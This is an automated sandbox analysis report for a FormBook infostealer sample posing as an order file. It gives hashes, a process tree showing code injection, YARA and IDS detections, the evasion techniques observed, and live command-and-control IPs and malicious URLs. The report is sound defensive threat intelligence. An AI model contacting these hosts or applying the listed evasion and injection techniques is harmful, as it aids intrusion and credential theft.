Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER - 401.exe

Overview

General Information

Sample name:ORDER - 401.exe
Analysis ID:1575104
MD5:0b1dccaee94a61586e90e0a62ab20100
SHA1:e0af85037a69f302e5f9f7343253ad6e1c800fd5
SHA256:c614c851b9fe906089e94db09ebd858fc5e4fa04613d92cd8566b3d34297381b
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ORDER - 401.exe (PID: 940 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 2124 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
      • ZaZCnGdXtY.exe (PID: 3136 cmdline: "C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 4072 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • ZaZCnGdXtY.exe (PID: 6008 cmdline: "C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.ORDER - 401.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.ORDER - 401.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:50:00.870710+010020507451Malware Command and Control Activity Detected192.168.2.549801154.12.28.18480TCP
                2024-12-14T13:50:26.635454+010020507451Malware Command and Control Activity Detected192.168.2.54986513.228.81.3980TCP
                2024-12-14T13:50:41.363963+010020507451Malware Command and Control Activity Detected192.168.2.549901172.67.129.3880TCP
                2024-12-14T13:50:56.996275+010020507451Malware Command and Control Activity Detected192.168.2.549942185.42.14.16680TCP
                2024-12-14T13:51:12.742743+010020507451Malware Command and Control Activity Detected192.168.2.549981209.74.77.10780TCP
                2024-12-14T13:51:27.644739+010020507451Malware Command and Control Activity Detected192.168.2.55002084.32.84.3280TCP
                2024-12-14T13:51:44.674370+010020507451Malware Command and Control Activity Detected192.168.2.550031154.208.202.22580TCP
                2024-12-14T13:51:59.883911+010020507451Malware Command and Control Activity Detected192.168.2.55003577.68.64.4580TCP
                2024-12-14T13:52:15.991017+010020507451Malware Command and Control Activity Detected192.168.2.550041208.91.197.2780TCP
                2024-12-14T13:52:30.801841+010020507451Malware Command and Control Activity Detected192.168.2.55004584.32.84.3280TCP
                2024-12-14T13:52:45.557053+010020507451Malware Command and Control Activity Detected192.168.2.550049104.21.77.7180TCP
                2024-12-14T13:53:00.357479+010020507451Malware Command and Control Activity Detected192.168.2.550053172.67.220.3680TCP
                2024-12-14T13:53:15.421804+010020507451Malware Command and Control Activity Detected192.168.2.550059162.0.217.3580TCP
                2024-12-14T13:53:30.855901+010020507451Malware Command and Control Activity Detected192.168.2.55006381.2.196.1980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:50:00.870710+010028554651A Network Trojan was detected192.168.2.549801154.12.28.18480TCP
                2024-12-14T13:50:26.635454+010028554651A Network Trojan was detected192.168.2.54986513.228.81.3980TCP
                2024-12-14T13:50:41.363963+010028554651A Network Trojan was detected192.168.2.549901172.67.129.3880TCP
                2024-12-14T13:50:56.996275+010028554651A Network Trojan was detected192.168.2.549942185.42.14.16680TCP
                2024-12-14T13:51:12.742743+010028554651A Network Trojan was detected192.168.2.549981209.74.77.10780TCP
                2024-12-14T13:51:27.644739+010028554651A Network Trojan was detected192.168.2.55002084.32.84.3280TCP
                2024-12-14T13:51:44.674370+010028554651A Network Trojan was detected192.168.2.550031154.208.202.22580TCP
                2024-12-14T13:51:59.883911+010028554651A Network Trojan was detected192.168.2.55003577.68.64.4580TCP
                2024-12-14T13:52:15.991017+010028554651A Network Trojan was detected192.168.2.550041208.91.197.2780TCP
                2024-12-14T13:52:30.801841+010028554651A Network Trojan was detected192.168.2.55004584.32.84.3280TCP
                2024-12-14T13:52:45.557053+010028554651A Network Trojan was detected192.168.2.550049104.21.77.7180TCP
                2024-12-14T13:53:00.357479+010028554651A Network Trojan was detected192.168.2.550053172.67.220.3680TCP
                2024-12-14T13:53:15.421804+010028554651A Network Trojan was detected192.168.2.550059162.0.217.3580TCP
                2024-12-14T13:53:30.855901+010028554651A Network Trojan was detected192.168.2.55006381.2.196.1980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:50:18.578499+010028554641A Network Trojan was detected192.168.2.54984313.228.81.3980TCP
                2024-12-14T13:50:21.234518+010028554641A Network Trojan was detected192.168.2.54984913.228.81.3980TCP
                2024-12-14T13:50:23.906363+010028554641A Network Trojan was detected192.168.2.54985913.228.81.3980TCP
                2024-12-14T13:50:33.366325+010028554641A Network Trojan was detected192.168.2.549882172.67.129.3880TCP
                2024-12-14T13:50:36.030415+010028554641A Network Trojan was detected192.168.2.549888172.67.129.3880TCP
                2024-12-14T13:50:38.712022+010028554641A Network Trojan was detected192.168.2.549895172.67.129.3880TCP
                2024-12-14T13:50:48.616036+010028554641A Network Trojan was detected192.168.2.549917185.42.14.16680TCP
                2024-12-14T13:50:51.276243+010028554641A Network Trojan was detected192.168.2.549929185.42.14.16680TCP
                2024-12-14T13:50:53.959214+010028554641A Network Trojan was detected192.168.2.549935185.42.14.16680TCP
                2024-12-14T13:51:04.317728+010028554641A Network Trojan was detected192.168.2.549959209.74.77.10780TCP
                2024-12-14T13:51:07.404255+010028554641A Network Trojan was detected192.168.2.549965209.74.77.10780TCP
                2024-12-14T13:51:10.137287+010028554641A Network Trojan was detected192.168.2.549974209.74.77.10780TCP
                2024-12-14T13:51:19.636546+010028554641A Network Trojan was detected192.168.2.54999884.32.84.3280TCP
                2024-12-14T13:51:22.304891+010028554641A Network Trojan was detected192.168.2.55000484.32.84.3280TCP
                2024-12-14T13:51:24.980711+010028554641A Network Trojan was detected192.168.2.55001284.32.84.3280TCP
                2024-12-14T13:51:35.606703+010028554641A Network Trojan was detected192.168.2.550028154.208.202.22580TCP
                2024-12-14T13:51:38.352647+010028554641A Network Trojan was detected192.168.2.550029154.208.202.22580TCP
                2024-12-14T13:51:41.083079+010028554641A Network Trojan was detected192.168.2.550030154.208.202.22580TCP
                2024-12-14T13:51:51.687251+010028554641A Network Trojan was detected192.168.2.55003277.68.64.4580TCP
                2024-12-14T13:51:54.365294+010028554641A Network Trojan was detected192.168.2.55003377.68.64.4580TCP
                2024-12-14T13:51:57.217666+010028554641A Network Trojan was detected192.168.2.55003477.68.64.4580TCP
                2024-12-14T13:52:07.434173+010028554641A Network Trojan was detected192.168.2.550038208.91.197.2780TCP
                2024-12-14T13:52:10.170829+010028554641A Network Trojan was detected192.168.2.550039208.91.197.2780TCP
                2024-12-14T13:52:12.932527+010028554641A Network Trojan was detected192.168.2.550040208.91.197.2780TCP
                2024-12-14T13:52:22.793820+010028554641A Network Trojan was detected192.168.2.55004284.32.84.3280TCP
                2024-12-14T13:52:25.457591+010028554641A Network Trojan was detected192.168.2.55004384.32.84.3280TCP
                2024-12-14T13:52:28.132803+010028554641A Network Trojan was detected192.168.2.55004484.32.84.3280TCP
                2024-12-14T13:52:37.562250+010028554641A Network Trojan was detected192.168.2.550046104.21.77.7180TCP
                2024-12-14T13:52:40.212187+010028554641A Network Trojan was detected192.168.2.550047104.21.77.7180TCP
                2024-12-14T13:52:42.888647+010028554641A Network Trojan was detected192.168.2.550048104.21.77.7180TCP
                2024-12-14T13:52:52.336545+010028554641A Network Trojan was detected192.168.2.550050172.67.220.3680TCP
                2024-12-14T13:52:55.020976+010028554641A Network Trojan was detected192.168.2.550051172.67.220.3680TCP
                2024-12-14T13:52:57.703236+010028554641A Network Trojan was detected192.168.2.550052172.67.220.3680TCP
                2024-12-14T13:53:07.609519+010028554641A Network Trojan was detected192.168.2.550054162.0.217.3580TCP
                2024-12-14T13:53:10.281537+010028554641A Network Trojan was detected192.168.2.550057162.0.217.3580TCP
                2024-12-14T13:53:12.937669+010028554641A Network Trojan was detected192.168.2.550058162.0.217.3580TCP
                2024-12-14T13:53:22.487121+010028554641A Network Trojan was detected192.168.2.55006081.2.196.1980TCP
                2024-12-14T13:53:25.152051+010028554641A Network Trojan was detected192.168.2.55006181.2.196.1980TCP
                2024-12-14T13:53:28.184283+010028554641A Network Trojan was detected192.168.2.55006281.2.196.1980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.123hellodrive.shop/vc3u/Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8Avira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8Avira URL Cloud: Label: malware
                Source: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jKAvira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: ORDER - 401.exeVirustotal: Detection: 77%Perma Link
                Source: ORDER - 401.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ORDER - 401.exeJoe Sandbox ML: detected
                Source: ORDER - 401.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER - 401.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZaZCnGdXtY.exe, 00000007.00000002.4676883405.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4676537211.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER - 401.exe, ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001BCC50 FindFirstFileW,FindNextFileW,FindClose,8_2_001BCC50
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax8_2_001A9F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h8_2_045F04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49843 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49888 -> 172.67.129.38:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49801 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49859 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49801 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49849 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49865 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49865 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49929 -> 185.42.14.166:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49942 -> 185.42.14.166:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49942 -> 185.42.14.166:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 185.42.14.166:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 185.42.14.166:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49882 -> 172.67.129.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49981 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49981 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49895 -> 172.67.129.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50020 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50035 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50031 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50031 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50034 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50043 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49901 -> 172.67.129.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49901 -> 172.67.129.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50044 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50047 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50053 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50053 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50046 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50042 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50050 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50057 -> 162.0.217.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49959 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50059 -> 162.0.217.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50054 -> 162.0.217.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50058 -> 162.0.217.35:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50035 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50049 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50059 -> 162.0.217.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50062 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50049 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50061 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50038 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50039 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50063 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50063 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50060 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50052 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50048 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50051 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50041 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50041 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50045 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50045 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 208.91.197.27:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aziziyeescortg.xyz
                Source: DNS query: www.54248711.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
